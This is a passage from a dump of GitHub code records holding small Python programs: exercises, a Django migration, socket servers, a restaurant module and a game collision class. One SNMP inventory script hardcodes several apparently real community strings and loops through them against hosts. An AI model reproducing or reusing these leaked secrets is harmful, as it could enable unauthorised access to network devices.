14]))\n","repo_name":"psymbio/cp","sub_path":"algoexpert/dp/03_can_sum.py","file_name":"03_can_sum.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69926062968","text":"mylist = []\r\nprint(\"Enter 5 elements for the list: \")\r\nfor i in range(5):\r\n value = int(input())\r\n mylist.append(value)\r\n# printing original list\r\nprint(\"The original list : \" + str(mylist))\r\n# Separating odd and even index elements\r\nodd_i = []\r\neven_i = []\r\nfor i in range(0, len(mylist)):\r\n if i % 2:\r\n even_i.append(mylist[i])\r\n else :\r\n odd_i.append(mylist[i])\r\nresult = odd_i + even_i\r\n# print result\r\nprint(\"Separated odd and even index list: \" + str(result))","repo_name":"avboi/pycodes","sub_path":"12. Input a list of numbers and swap elements at the even location with the elements at the.py","file_name":"12. Input a list of numbers and swap elements at the even location with the elements at the.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19041807262","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.datetime_safe\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('post', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='post',\n name='created_at',\n field=models.DateTimeField(default=django.utils.datetime_safe.datetime.now, editable=False),\n preserve_default=False,\n ),\n ]\n","repo_name":"bkawan/manutd.org.np","sub_path":"apps/post/migrations/0002_post_created_at.py","file_name":"0002_post_created_at.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2782573009","text":"#!/usr/bin/env python3\n#import pdb;pdb.set_trace()\nfrom easysnmp import snmp_get\nfrom easysnmp.variables import SNMPVariable\n\nsnmp_ro=['noC2mae8Dee3','kp2x45dv8v','ghbitktw','xaxbkfi8yp0vuos']\nsnmp_oid_hostname='.1.3.6.1.2.1.1.5.0'\nsnmp_version=[2,1]\n\ndef fun_snmp(ip,oid=snmp_oid_hostname,snmp_v=snmp_version,snmp_r=snmp_ro):\n value=SNMPVariable('')\n for ver in snmp_v:\n for com in snmp_r:\n #print(ip,ver,com,oid)\n try:\n value=snmp_get(oid, hostname=ip, community=com, version=ver,retries=0,timeout=1)\n except:\n value=SNMPVariable('')\n else:\n return (value.value,com,ver)\n return (value.value,'snmp_ro','snmp_vers') \n#s=fun_snmp('10.218.59.86')\n#print(s)\n","repo_name":"Dmitriy-Zaytsev/code","sub_path":"code/python/inventory_network/mysnmp.py","file_name":"mysnmp.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25618268152","text":"import csv\nfrom Town import Town\n\n\ndef import_file(filename):\n '''\n Gets coordinate data and puts them as Town nodes from CSV file\n :return: List of Town objects\n '''\n with open(filename, \"r\") as myfile:\n reader = csv.reader(myfile)\n next(reader)\n towns = []\n for line in reader:\n num_array = []\n for num in line:\n num_array.append(int(float(num)))\n towns.append(Town(num_array[0], num_array[1], num_array[2]))\n return towns\n\ndef get_data():\n '''\n Gets coordinate data from CSV file\n :return: List of lists of coords\n '''\n with open('cities_subset40.csv', 'r') as f:\n reader = csv.reader(f)\n 
next(reader)\n city_coords = []\n for row in reader:\n city_coords.append([int(float(row[1])), int(float(row[2]))])\n data = city_coords\n return data\n\n# def get_coordinates(data):\n# result = []\n# for i in data:\n# result.append(i)\n# print(\"coordinates acquired\")\n# return result\n\n\ndef get_distance(coord_1, coord_2):\n # Returns distance between two coordinates using Pythagoras' Equation\n return round(((coord_1[0] - coord_2[0]) ** 2 + (coord_1[1] - coord_2[1]) ** 2) ** 0.5)\n\n\ndef get_edges(coordinates):\n # Gets all combinations of coordinates, get indices of them, and gets distance between the two.\n\n combos = []\n for i in coordinates:\n for j in coordinates:\n if i != j:\n combos.append([coordinates.index(i), coordinates.index(j), get_distance(i, j)])\n return combos\n","repo_name":"Expensure/IPASS_ShortestPath","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43317330213","text":"import sys\n\n\nmersenne = [3, 7, 31, 127, 2047]\n\n\ndef main():\n test_cases = open(sys.argv[1], 'r')\n for test in test_cases:\n test = test.strip()\n if len(test) == 0:\n continue\n test = int(test)\n result = []\n for m in mersenne:\n if test > m:\n result.append(m)\n print(', '.join([str(r) for r in result]))\n test_cases.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"daleysoftware/codeeval","sub_path":"0-easy/mersenne-prime/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"77"} +{"seq_id":"18575318218","text":"import math\nprint('''\nMenu de Opções:\n 1. Somar dois números\n 2. 
Raiz quadrada de um número\n \n''')\nbotaoMenu = int(input(\"\\nDigite a opção desejada: \"))\n\nif botaoMenu == 1:\n numero01 = int(input(\"Digite o primeiro numero: \"))\n numero02 = int(input(\"Digite o segundo numero: \"))\n print(\"O resultado da sua soma é: \", numero01 + numero02)\n\nelif botaoMenu == 2:\n numero03 = int(input(\"Digite um numero: \"))\n raizQuadrada = math.sqrt(numero03)\n print(\"A raiz quadrada de {}\".format(numero03),\"é: \", raizQuadrada)","repo_name":"dihogoteixeira/fiap-ctp-exercises","sub_path":"exercicios-aula-09/AULA_09_Exercicio18.py","file_name":"AULA_09_Exercicio18.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19829011546","text":"def cadastro_produtos(produto, Produtos): # Função para cadastro de produtos\n achou= False\n while True:\n cod_produto=int(input('Digite o código do produto (Digite 0 para SAIR): '))\n if cod_produto == 0:\n break\n for i in range(len(produto)):\n if cod_produto == produto[i].Cod_prod:\n achou= True\n break\n if achou:\n print('Codigo já cadastrado para esse produto!!!')\n break\n else:\n nome=input('Nome produto: ')\n qtd_estoque=int(input('Quantidade: '))\n preco=float(input('Preço do produto: '))\n\n produto.append(Produtos(cod_produto,nome,qtd_estoque,preco))\n print('Produto cadastrado')\n print()\n\ndef atualiza_produtos(produto): # Função para atualizar produto\n achou= False\n cod_produto=int(input('Digite o código do produto: '))\n for i in range(len(produto)):\n if cod_produto == produto[i].Cod_prod:\n achou= True\n break\n if achou:\n atualizar=input('Deseja atualizar preço ou quantidade em estoque (1-preço ou 2-quantidade): ')\n if atualizar == '1':\n produto[i].Preco=float(input('Novo preço: '))\n else:\n produto[i].Qtd_estoque=int(input('Nova quantidade em estoque: '))\n print('Produto atualizado!!!')\n else:\n print('Produto não encontrado!!!!')\n print()\n\ndef pesquisa_produto(produto): # Função para pesquisa\n prod=int(input('Digite o código do produto: '))\n achou= False\n for i in range(len(produto)):\n if prod == produto[i].Cod_prod:\n achou= True\n break\n if achou == False:\n print('Produto não encontrado!!!')\n else:\n print(f'Cod_produto: {produto[i].Cod_prod} - Nome: {produto[i].Nome} - Estoque: {produto[i].Qtd_estoque} - Preço: {produto[i].Preco}')\n print()\n\ndef exclui_produto(produto): # Função para excluir produto\n achou= False\n cod_produto=int(input('Digite o código do produto: '))\n for i in range(len(produto)):\n if cod_produto == produto[i].Cod_prod:\n achou= True\n break\n if achou:\n del(produto[i])\n print('Produto Excluido')\n else:\n print('Produto não encontrado!!!!')\n print()\n\ndef visualizar_produtos(produto): # Função para visualizar todos os produtos\n print('|---------------Tabela de Produtos-----------------|')\n for i in range(len(produto)):\n print(f'Cod_produto: {produto[i].Cod_prod} - Nome: {produto[i].Nome} - Estoque: {produto[i].Qtd_estoque} - Preço: {produto[i].Preco}')\n print()\n\ndef registro_vendas(venda,produto,Vendas): # Função para vender\n acum= 0\n num_comanda=int(input('Número da comando: '))\n achou= False\n for l in range(len(venda)):\n if num_comanda == venda[l].Num_comanda:\n achou= True\n break\n if achou:\n print('Número da comanda já existenti')\n else:\n while True:\n cod_produto=int(input('Código do produto (Digite 0 para SAIR): '))\n if cod_produto == 0:\n break\n achou= False\n for i in range(len(produto)):\n if cod_produto == 
produto[i].Cod_prod:\n achou= True\n break\n if achou == False:\n print('Produto não encontrado!!!')\n break\n else:\n qtd=int(input('Quantidade: '))\n venda.append(Vendas(num_comanda,cod_produto,qtd,0,0,0,0))\n print()\n print('Nº comanda ---------> {}'.format(venda[i].Num_comanda)) \n for i in range(len(venda)):\n for j in range(len(produto)):\n if venda[i].Cod_prod == produto[j].Cod_prod:\n print(f'Código do produto ------> {venda[i].Cod_prod}')\n print(f'Nome produto ---> {produto[j].Nome}')\n print(f'Qtd ------> {venda[i].Qtd}')\n print(f'Preço unitario -----> R${produto[j].Preco}')\n venda[i].Valor= venda[i].Qtd * produto[j].Preco\n print(f'Preço total do produto -------> R${venda[i].Valor}')\n acum+= venda[i].Valor\n venda[i].Total= acum\n if produto[j].Cod_prod == venda[i].Cod_prod:\n produto[j].Qtd_estoque= produto[j].Qtd_estoque - venda[i].Qtd\n print('########################################')\n print(f'Valor total da venda ------> R${venda[i].Total}')\n print('########################################')\n print()\n\ndef pagamento(venda,produto): # Função de pagamento\n numcomanda=int(input('Nº da comanda: '))\n achou= False\n for i in range(len(venda)):\n if numcomanda == venda[i].Num_comanda:\n achou= True\n break\n if achou == False:\n print('Comanda não encontrada!!!')\n else:\n print()\n print(f'Nº comanda ---------> {venda[i].Num_comanda}')\n for i in range(len(venda)):\n print(f'Código do produto ------> {venda[i].Cod_prod}')\n print(f'Nome produto ---> {produto[i].Nome}')\n print(f'Qtd ------> {venda[i].Qtd}')\n print(f'Preço unitario -----> R${produto[i].Preco}')\n print(f'Preço total do produto -------> R${venda[i].Valor}')\n print('########################################')\n print(f'Valor total da venda ------> R${venda[i].Total}')\n print('########################################')\n venda[i].Forma_pag=input('Qual a forma de pagamento --> 1-Dinheiro, 2-Pix, 3-Cartão: ')\n if venda[i].Forma_pag == '1':\n dinheiro=float(input('Dinheiro: '))\n venda[i].Troco= dinheiro - venda[i].Total\n print(f'Forma de pagamento ------> {venda[i].Forma_pag} - Dinheiro')\n print(f'Troco ------> R${venda[i].Troco}')\n print()\n elif venda[i].Forma_pag == '2':\n print(f'Forma de pagamento ------> {venda[i].Forma_pag} - Pix')\n print('Chave Pix: 14589752')\n elif venda[i].Forma_pag == '3':\n cartao=input('1-Débito ou 2-Crédito: ')\n if cartao == '1' or cartao == '2':\n print(f'Forma de pagamento ------> {venda[i].Forma_pag} - Cartão')\n print('Insira o cartão ou Aproxime')\n else:\n print('Forma de pagamento inválida!!!')\n else:\n print('Forma de pagamento inválida!!!')\n print()\n\ndef excluir_compra(venda): # Função para excluir venda\n achou= False\n cod_comanda=int(input('Digite o código da comanda: '))\n for i in range(len(venda)):\n if cod_comanda == venda[i].Num_comanda:\n achou= True\n break\n if achou:\n del(venda[i])\n print('Venda Excluida!!!')\n else:\n print('Nº da comanda não encontrada!!!!')\n print()\n\ndef pesquisa_venda(venda): # Função para pesquisar venda\n vend=int(input('Digite o código da comanda: '))\n achou= False\n for i in range(len(venda)):\n if vend == venda[i].Num_comanda:\n achou= True\n break\n if achou == False:\n print('Comanda não encontrado!!!')\n else:\n print(f'Nº da comanda: {venda[i].Num_comanda}')\n for i in range(len(venda)):\n print(f'Cod do produto: {venda[i].Cod_prod}')\n print(f'Quantidade: {venda[i].Qtd}')\n print(f'Valor: R${venda[i].Valor}') \n print(f'Pagamento: {venda[i].Forma_pag}') \n print(f'Troco: R${venda[i].Troco}') \n print(f'Total 
da venda: R${venda[i].Total}')\n print()","repo_name":"Mari2213/Sistema-de-Restaurante","sub_path":"Restaurante/modulorestaurante.py","file_name":"modulorestaurante.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2992898778","text":"import socket\n#importa a bib socket\n\nMEU_IP = '' \n# Endereco IP do Servidor, '' = significa que ouvira em todas as interfaces\n\nMINHA_PORTA = 5000\n# Porta que o Servidor vai ouvir\n\ncliente1 = (\"127.0.0.1\", 7000)\ncliente2 = (\"127.0.0.1\", 12000) \n\nudp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n#socket.SOCK_DGRAM=usaremos UDP\n\nMEU_SERVIDOR = (MEU_IP, MINHA_PORTA) \nudp.bind(MEU_SERVIDOR)\n# faz o bind do ip e a porta para que possa comecar a ouvir\nprint(\"O servidor está ligado!\")\n\nwhile(True):\n Mensagem_Recebida, END_cliente = udp.recvfrom(1024)\n # socket.recvfrom(bufsize[, flags]) deve ser uma potencia de 2\n #Recebe dados do soquete = um par (string, endereco) onde string eh uma string representando os dados recebidos\n \n if(END_cliente[1] == 7000):\n print (\"Recebi =\", Mensagem_Recebida.decode(\"utf-8\"),\", do cliente\", END_cliente)\n # endereco eh o endereco do socket que enviou os dados.\n\n udp.sendto (Mensagem_Recebida, cliente2)\n print (\"Enviei =\", Mensagem_Recebida.decode(\"utf-8\"),\", para o cliente\", cliente2)\n else:\n print (\"Recebi =\", Mensagem_Recebida.decode(\"utf-8\"),\", do cliente\", END_cliente)\n # endereco eh o endereco do socket que enviou os dados.\n\n udp.sendto (Mensagem_Recebida, cliente1)\n print (\"Enviei =\", Mensagem_Recebida.decode(\"utf-8\"),\", para o cliente\", cliente1)\n \n if(Mensagem_Recebida.decode(\"utf-8\") == \"quit\"):\n print(\"Encerrando comunicação...\")\n break\n\nudp.close()\n#fim do socket","repo_name":"mizaelgoonfs/RedesComputadores","sub_path":"servidor_UDP.py","file_name":"servidor_UDP.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37445595590","text":"import os\r\nfrom socket import *\r\nfrom threading import Thread\r\nimport sys, select\r\nfrom collections import defaultdict\r\nimport datetime\r\nimport time\r\nimport random\r\nimport json\r\n\r\n'''\r\nthe python version is python3\r\nread the arguments in the terminal, there are two arguments:\r\n1.the server's port\r\n2. 
the number of consecutive failed logins allowed before a user gets blocked\r\n'''\r\nif len(sys.argv) != 3:\r\n    print(\"\\n===== Error usage, python3 server.py SERVER_PORT Time_to_Block======\\n\")\r\n    exit(0)\r\nserverHost = \"127.0.0.1\"\r\nserverPort = int(sys.argv[1])\r\nserverAddress = (serverHost, serverPort)\r\n\r\n# define socket for the server side and bind address\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\nserverSocket.bind(serverAddress)\r\n\r\n\r\n# create a multi-thread server\r\nclass ClientThread(Thread):\r\n    '''\r\n    The class attribute 'num_of_user' counts how many users are currently using the server, the list 'accounts' stores the names of the logged-in users, and 'login_block' stores the users who are blocked because of wrong passwords together with the time at which they may log in again.\r\n    The __init__ function stores the basic arguments of the server:\r\n    login_failed_times counts how many times the user typed a wrong password\r\n    name stores the user name of this connection\r\n    '''\r\n    num_of_user = 0\r\n    accounts = []\r\n    login_block = defaultdict(datetime.datetime)\r\n\r\n    def __init__(self, clientAddress, clientSocket):\r\n        Thread.__init__(self)\r\n        self.clientAddress = clientAddress\r\n        self.clientSocket = clientSocket\r\n        self.login_failed_times = defaultdict(int)\r\n        # self.login_block = defaultdict(datetime.datetime)\r\n        self.name = ''\r\n        self.block_time = int(sys.argv[2])\r\n        print(\"===== New connection created for: \", clientAddress)\r\n        self.clientAlive = True\r\n\r\n    def run(self):\r\n        message = ''\r\n\r\n        while self.clientAlive:\r\n            data = self.clientSocket.recv(1024)\r\n            message = data.decode()\r\n\r\n            # if the message from the client is empty, the client has gone off-line, so mark it as offline (clientAlive=False)\r\n            if message == '':\r\n                self.clientAlive = False\r\n                print(\"===== the user disconnected - \", self.clientAddress)\r\n                break\r\n\r\n            '''\r\n            if the client message contains one of the known requests, run the matching handler\r\n            '''\r\n            if 'login' in message:\r\n                print(\"[recv] New login request\")\r\n                self.process_login(message)\r\n\r\n            elif \"EDG\" in message:\r\n                print(\"[recv] New EDG request\")\r\n                message = self.name\r\n                self.clientSocket.send(message.encode())\r\n\r\n            elif \"UED\" in message:\r\n                print(f\"[recv] Edge device {self.name} issued UED command\")\r\n                print(f'A data file is received from edge device {self.name}')\r\n                try:\r\n                    req, id = message.split(' ')\r\n                    id = int(id)\r\n                except ValueError:\r\n                    print(\"UED command requires fileID as an argument, and the fileID must be an integer\")\r\n                else:\r\n                    message = self.name\r\n                    self.clientSocket.send(message.encode())\r\n\r\n            elif \"uploadingdata\" in message:\r\n                data = message.split(' ')\r\n                fileid = data[1]\r\n                data = data[2:]\r\n                with open(f\"{self.name}-{fileid}.txt\", 'w+') as file:\r\n                    for item in data:\r\n                        file.write(item)\r\n                message = f\"The file with ID of {fileid} has been received, upload-log.txt file has been updated\"\r\n                print(message)\r\n                self.clientSocket.send(message.encode())\r\n                dataAmount = len(data)\r\n                self.uploadlog(fileid, dataAmount)\r\n\r\n            elif \"SCS\" in message:\r\n                print(\"[recv] New SCS request\")\r\n                try:\r\n                    req, id, operation = message.split(' ')\r\n                    id = int(id)\r\n                except ValueError:\r\n                    message = \"fileID or operation is missing, and the fileID should be an integer\"\r\n                    self.clientSocket.send(message.encode())\r\n                else:\r\n                    print(f'Edge device {self.name} requested a computation operation on the file with ID of {id}')\r\n                    self.scs(id, operation)\r\n\r\n            elif \"DTE\" in message:\r\n                try:\r\n                    req, id = message.split(' ')\r\n                    id = int(id)\r\n                except ValueError:\r\n                    print(\"DTE command requires fileID as an argument, and the fileID must be an integer\")\r\n                else:\r\n                    print(f\"Edge device {self.name} issued DTE command, the file ID is {id}\")\r\n                    self.dte(id)\r\n\r\n            elif message == \"AED\":\r\n                message = ''\r\n                print(f\"The edge device {self.name} issued AED command\")\r\n                try:\r\n                    with open('edge_device_log.txt', 'r') as AED_file:\r\n                        data = AED_file.readlines()\r\n                    for item in data:\r\n                        no, timestamp, username, host, port = item.split('; ')\r\n                        if self.name == username:\r\n                            continue\r\n                        message += f'{username}; {host}; {port}; {timestamp}\\n'\r\n                except FileNotFoundError:\r\n                    message = 'no other active edge devices'\r\n                    print(message)\r\n                else:\r\n                    print(f'Return messages: {message}')\r\n                if message == '':\r\n                    message = 'None'\r\n                self.clientSocket.send(message.encode())\r\n\r\n            elif message == \"OUT\":\r\n                ClientThread.num_of_user -= 1\r\n                ClientThread.accounts.remove(self.name)\r\n                print(f\"[recv] {self.name} exited the edge network\")\r\n                self.clientAlive = False\r\n\r\n                findout = False\r\n                with open('edge_device_log.txt', 'r') as AED_file:\r\n                    data = AED_file.readlines()\r\n                with open('edge_device_log.txt', 'w+') as AED_file:\r\n                    for item in data:\r\n                        if item == '\\n':\r\n                            continue\r\n                        no, timestamp, name, host, port = item.split(\"; \")\r\n                        no = int(no)\r\n                        if self.name == name:\r\n                            findout = True\r\n                            continue\r\n                        elif self.name != name and findout == False:\r\n                            AED_file.write(f\"{no}; {timestamp}; {name}; {host}; {port}\\n\")\r\n                        elif self.name != name and findout == True:\r\n                            AED_file.write(f\"{no - 1}; {timestamp}; {name}; {host}; {port}\\n\")\r\n                message = f\"Bye, {self.name}!\"\r\n                self.clientSocket.send(message.encode())\r\n\r\n            elif \"UVF\" in message:\r\n                findout = False\r\n                reply_message = f'{self.name} False null null'\r\n                req, devicename = message.split()\r\n                with open('edge_device_log.txt', 'r') as file:\r\n                    data = file.readlines()\r\n                for item in data:\r\n                    no, timestamp, name, host, port = item.split('; ')\r\n                    if name == devicename:\r\n                        findout = True\r\n                        reply_message = f'{self.name} {findout} {host} {port}' # str(findout)+' '+host+' '+port\r\n                        break\r\n\r\n                self.clientSocket.send(reply_message.encode())\r\n\r\n            # if the message does not match any known request, reply that the request cannot be understood\r\n            else:\r\n                print(\"[recv] \" + message)\r\n                print(\"[send] Cannot understand this message\")\r\n                message = 'Cannot understand this message'\r\n                self.clientSocket.send(message.encode())\r\n\r\n    '''\r\n    Login helper. It first splits the username and password out of the message, then checks whether the user is currently blocked; if not, it checks the credentials file to complete the login.
 Every wrong password is recorded; once the number of failures reaches the block threshold, the user is prevented from logging in for ten seconds.\r\n    '''\r\n\r\n    def process_login(self, message):\r\n        action, username, password = message.split(\" \")\r\n        # if the username is currently blocked, report it and return\r\n        if username in ClientThread.login_block and datetime.datetime.now() < ClientThread.login_block[username]:\r\n            sleeptime = (datetime.datetime.strptime(\r\n                datetime.datetime.strftime(ClientThread.login_block[username], \"%Y/%m/%d %H:%M:%S\"),\r\n                \"%Y/%m/%d %H:%M:%S\") - datetime.datetime.strptime(\r\n                datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\"), \"%Y/%m/%d %H:%M:%S\")).seconds\r\n            reply_message = f\"login failed, the user is blocked now, please wait for {sleeptime} sec.\"\r\n            print('[send] ' + reply_message)\r\n            self.clientSocket.send(reply_message.encode())\r\n            time.sleep(sleeptime)\r\n            return\r\n        # open the credentials file to check the username and password\r\n        with open('credentials.txt', 'r') as credentials_file:\r\n            credentials_content = credentials_file.read()\r\n        login_success = False\r\n\r\n        for row in credentials_content.split('\\n'):\r\n            try:\r\n                row_username, row_password = row.split(' ')\r\n            except ValueError:\r\n                continue\r\n            if username == row_username and password == row_password:\r\n                self.name = username\r\n                login_success = True\r\n                ClientThread.accounts.append(self.name)\r\n\r\n        if login_success:\r\n            reply_message = 'admin login success.'\r\n            ClientThread.num_of_user += 1\r\n            now = datetime.datetime.now()\r\n            timestamp = now.strftime(\"%d %B %Y %H:%M:%S\")\r\n            with open(\"edge_device_log.txt\", 'a+') as devicelog_file:\r\n                content = f\"{ClientThread.num_of_user}; {timestamp}; {self.name}; {serverHost}; {serverPort}\\n\"\r\n                devicelog_file.write(content)\r\n        else:\r\n            self.login_failed_times[username] += 1\r\n            reply_message = f'admin login failed. user:{username} failed {self.login_failed_times[username]} times. If the user fails {self.block_time} times, it will be blocked.'\r\n            print(reply_message)\r\n            if self.login_failed_times[username] == self.block_time:\r\n                reply_message += f'\\n failed attempts reached {self.login_failed_times[username]}, the user is blocked for 10 sec'\r\n                self.login_failed_times[username] = 0\r\n                ClientThread.login_block[username] = datetime.datetime.now() + datetime.timedelta(seconds=10)\r\n\r\n        print('[send] ' + reply_message)\r\n        self.clientSocket.send(reply_message.encode())\r\n\r\n    # do the SCS calculation; if the operation does not exist, reply that the requested operation does not exist\r\n    def scs(self, fileid, operation):\r\n        if self.name == '':\r\n            message = \"not logged in\"\r\n        else:\r\n            try:\r\n                with open(f\"{self.name}-{fileid}.txt\", 'r') as file:\r\n                    data = file.readlines()\r\n            except FileNotFoundError:\r\n                message = \"the file is not on the server, so the operation cannot be performed.\"\r\n            else:\r\n\r\n                for i in range(len(data)):\r\n                    data[i] = int(data[i])\r\n                if operation == \"SUM\":\r\n                    message = f'{operation} computation has been made on edge device {self.name} data file (ID:{fileid}), the result is ' + str(\r\n                        sum(data))\r\n                elif operation == \"AVERAGE\":\r\n                    message = f'{operation} computation has been made on edge device {self.name} data file (ID:{fileid}), the result is ' + (\r\n                        str(sum(data) / len(data)))\r\n                elif operation == \"MAX\":\r\n                    message = f'{operation} computation has been made on edge device {self.name} data file (ID:{fileid}), the result is ' + str(\r\n                        max(data))\r\n                elif operation == \"MIN\":\r\n                    message = f'{operation} computation has been made on edge device {self.name} data file (ID:{fileid}), the result is ' + str(\r\n                        min(data))\r\n                else:\r\n                    message = 'The operation does not exist'\r\n            print(f'Return message: {message}')\r\n        self.clientSocket.send(message.encode())\r\n\r\n    # delete the file on the server and update the deletion log file\r\n    def dte(self, fileID):\r\n        if self.name == '':\r\n            message = \"not logged in\"\r\n\r\n        else:\r\n            filename = f\"{self.name}-{fileID}.txt\"\r\n            if not os.path.exists(filename):\r\n                message = 'the file does not exist at the server side'\r\n            else:\r\n                with open(filename, 'r+') as file:\r\n                    data = file.readlines()\r\n                datamat = len(data)\r\n\r\n                now = datetime.datetime.now()\r\n                timestamp = now.strftime(\"%d %B %Y %H:%M:%S\")\r\n                content = f\"{self.name}; {timestamp}; {fileID}; {datamat}\\n\"\r\n                with open(\"deletion_log.txt\", 'a') as delete_file:\r\n                    delete_file.write(content)\r\n                os.remove(filename)\r\n\r\n                message = f\"The file with ID of {fileID} from edge device {self.name} has been deleted, \\\r\n                deletion log file has been updated\"\r\n                print(f'Return message: {message}')\r\n\r\n        self.clientSocket.send(message.encode())\r\n\r\n    # the uploadlog function supports the UED command.\r\n    # after the file is uploaded to the server, the server runs this function to update the upload_log file\r\n    def uploadlog(self, fileID, dataAmount):\r\n        dt_now = datetime.datetime.now().strftime(\"%d %B %Y %H:%M:%S\")\r\n        with open(\"upload_log.txt\", 'a+') as file:\r\n            content = f\"{self.name}; {dt_now}; {fileID}; {dataAmount}\\n\"\r\n            file.write(content)\r\n\r\n\r\nprint(\"\\n===== Server is running =====\")\r\nprint(\"===== Waiting for connection request from clients...=====\")\r\n\r\nwhile True:\r\n    serverSocket.listen()\r\n    clientSocket, clientAddress = serverSocket.accept()\r\n    clientThread = ClientThread(clientAddress, clientSocket)\r\n    
clientThread.start()\r\n","repo_name":"TUCN1022/COMP9331","sub_path":"9331/Ass/code/Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":15617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35119106047","text":"A_birth=0x7d0\r\nA_age=0x12\r\nB_age=0o22\r\nC_age=18\r\nprint(A_birth,',',A_age,',',B_age,',',C_age)\r\n\r\nprint(-2.5287e2)\r\n\r\ndef almost_equal():\r\n \"\"\"두 실수가 거의 같은지 검사하는 함수\"\"\"\r\n import math\r\n real1=float(input())\r\n real2=float(input())\r\n metric=abs(real1-real2)\r\n return metric\r\nbound=float(input())\r\nresult=almost_equal() tuple:\n return load_fasta(filepath)[1]\n\n\ndef trans_ratio(s1: str, s2: str) -> float:\n transitions = ['AG', 'GA', 'CT', 'TC']\n transversions = ['AC', 'CA', 'AT', 'TA', 'CG', 'GC', 'GT', 'TG']\n transition_count, transversion_count = 0, 0\n for i in range(0, len(s1)):\n temp = f'{s1[i]}{s2[i]}'\n if temp in transitions:\n transition_count += 1\n elif temp in transversions:\n transversion_count += 1\n return transition_count / transversion_count\n\n\nif __name__ == '__main__':\n path = \"datasets/031.tran.in\"\n s1, s2 = load_data(path)\n print(trans_ratio(s1, s2))\n","repo_name":"xwmp3/rosalind-python","sub_path":"bioinfomatics-stronghold/031.tran.py","file_name":"031.tran.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17127127130","text":"import pygame\nfrom pygame import Vector2\nfrom classes.player import Player\n\n\nclass Ball:\n pos: Vector2\n direction: Vector2\n velocity: float\n radius: int = 8\n border_x: int = 600\n border_y: int = 600\n\n # closest_point: Vector2 = Vector2(0, 0)\n # normal_vector: Vector2 = Vector2(1, -1)\n\n plrs_info = []\n\n screen = None\n\n def __init__(self, x: float, y: float, speed: float, screen=None) -> None:\n self.pos = Vector2(x, y)\n self.direction = Vector2(1, 0).normalize()\n self.velocity = speed\n self.screen = screen\n\n def move(self):\n self.pos += self.velocity * self.direction\n\n def draw(self, screen):\n pygame.draw.circle(screen, (255, 255, 255),\n (self.pos.x, self.pos.y), self.radius)\n\n def reflect(self, normal_vector):\n self.direction = self.direction.reflect(normal_vector)\n\n def get_closest_from_inside(plr):\n pass\n\n def collide_plr(self, plr: Player, plr_info: int):\n # box_mid = Vector2(plr.x + plr.size_x / 2, plr.y + plr.size_y / 2)\n is_left = False\n is_right = False\n is_inside = False\n\n if self.pos.x < plr.x:\n is_left = True\n elif self.pos.x > plr.x + plr.size_x:\n is_right = True\n\n if self.pos.y <= plr.y:\n # Pos above player\n if is_right: # Top right corner closest\n plr_info[\"closest_point\"] = Vector2(plr.x + plr.size_x, plr.y)\n plr_info[\"normal_vector\"] = (\n self.pos-plr_info[\"closest_point\"]).normalize()\n elif is_left: # Top left corner\n plr_info[\"closest_point\"] = Vector2(plr.x, plr.y)\n plr_info[\"normal_vector\"] = (\n self.pos-plr_info[\"closest_point\"]).normalize()\n else: # top\n plr_info[\"closest_point\"] = Vector2(self.pos.x, plr.y)\n plr_info[\"normal_vector\"] = Vector2(0, -1)\n elif self.pos.y >= plr.y + plr.size_y:\n # Pos below player\n if is_right: # Bottom right\n plr_info[\"closest_point\"] = Vector2(\n plr.x + plr.size_x, plr.y + plr.size_y)\n plr_info[\"normal_vector\"] = (\n self.pos-plr_info[\"closest_point\"]).normalize()\n elif is_left: # Bottom left\n plr_info[\"closest_point\"] = Vector2(plr.x, plr.y + plr.size_y)\n 
